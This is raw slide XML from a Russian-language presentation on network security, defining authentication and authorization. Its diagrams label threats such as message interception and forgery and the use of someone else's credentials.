              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2906640" y="4476600"/>
            <a:ext cx="2664720" cy="1521720"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cccc00"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сеть</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="308" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428840" y="4629240"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="309" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381720" y="4629240"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="310" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4044960" y="3181320"/>
            <a:ext cx="688320" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2311560" y="4248000"/>
            <a:ext cx="1736280" cy="1018440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1736280"/>
              <a:gd name="textAreaRight" fmla="*/ 1738440 w 1736280"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 1018440"/>
              <a:gd name="textAreaBottom" fmla="*/ 1020600 h 1018440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="1095" h="643">
                <a:moveTo>
                  <a:pt x="0" y="633"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="629"/>
                  <a:pt x="327" y="643"/>
                  <a:pt x="472" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="617" y="593"/>
                  <a:pt x="764" y="586"/>
                  <a:pt x="868" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="972" y="380"/>
                  <a:pt x="1048" y="101"/>
                  <a:pt x="1095" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="lg" type="stealth" w="lg"/>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
        <p:nvSpPr>
          <p:cNvPr id="312" name="Text Box 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821120" y="3257640"/>
            <a:ext cx="2166840" cy="825480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>перехватывает и</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>подделывает</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сообщения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4737240" y="4216320"/>
            <a:ext cx="1610640" cy="1017000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1610640"/>
              <a:gd name="textAreaRight" fmla="*/ 1612800 w 1610640"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 1017000"/>
              <a:gd name="textAreaBottom" fmla="*/ 1019160 h 1017000"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="1016" h="642">
                <a:moveTo>
                  <a:pt x="1016" y="630"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="949" y="628"/>
                  <a:pt x="754" y="642"/>
                  <a:pt x="623" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="492" y="594"/>
                  <a:pt x="331" y="586"/>
                  <a:pt x="227" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="380"/>
                  <a:pt x="47" y="101"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd len="lg" type="stealth" w="lg"/>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4" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468360" y="115920"/>
            <a:ext cx="7125840" cy="1150200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pP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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация/ авторизация</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8456040" cy="4874760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="330066"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab algn="l" pos="339840"/>
                <a:tab algn="l" pos="787320"/>
                <a:tab algn="l" pos="1236600"/>
                <a:tab algn="l" pos="1685880"/>
                <a:tab algn="l" pos="2135160"/>
                <a:tab algn="l" pos="2584440"/>
                <a:tab algn="l" pos="3033720"/>
                <a:tab algn="l" pos="3483000"/>
                <a:tab algn="l" pos="3932280"/>
                <a:tab algn="l" pos="4381560"/>
                <a:tab algn="l" pos="4830840"/>
                <a:tab algn="l" pos="5280120"/>
                <a:tab algn="l" pos="5729400"/>
                <a:tab algn="l" pos="6178680"/>
                <a:tab algn="l" pos="6627960"/>
                <a:tab algn="l" pos="7077240"/>
                <a:tab algn="l" pos="7526160"/>
                <a:tab algn="l" pos="7975440"/>
                <a:tab algn="l" pos="8424720"/>
                <a:tab algn="l" pos="8874000"/>
                <a:tab algn="l" pos="9323280"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> -  установление подлинности пользователя</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Text Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2131560" cy="455040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="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C293D6E2-F05B-401F-B90B-4CA5364F52DD}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2763720" y="4081320"/>
            <a:ext cx="2664720" cy="1521720"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cccc00"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr" defTabSz="44928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en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сеть</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285920" y="4233960"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238800" y="4233960"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902040" y="2786040"/>
            <a:ext cx="688320" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Text Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121720" y="2779560"/>
            <a:ext cx="2726280" cy="825480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>использует чужие </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>идентификационные </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>данные</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4594320" y="3821040"/>
            <a:ext cx="1610640" cy="1017000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1610640"/>
              <a:gd name="textAreaRight" fmla="*/ 1612800 w 1610640"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 1017000"/>
              <a:gd name="textAreaBottom" fmla="*/ 1019160 h 1017000"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="1016" h="642">
                <a:moveTo>
                  <a:pt x="1016" y="630"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="949" y="628"/>
                  <a:pt x="754" y="642"/>
                  <a:pt x="623" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="492" y="594"/>
                  <a:pt x="331" y="586"/>
                  <a:pt x="227" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="380"/>
                  <a:pt x="47" y="101"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd len="lg" type="stealth" w="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="323" name="Picture 10" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4467240" y="3500280"/>
            <a:ext cx="531360" cy="48348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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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3.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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4.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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5.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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6.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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7.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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8.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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9.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei" pitchFamily="0" charset="1"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial" pitchFamily="0" charset="1"/>
        <a:ea typeface=""/>
        <a:cs typeface="WenQuanYi Micro Hei"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xml><?xml version="1.0" encoding="utf-8"?>
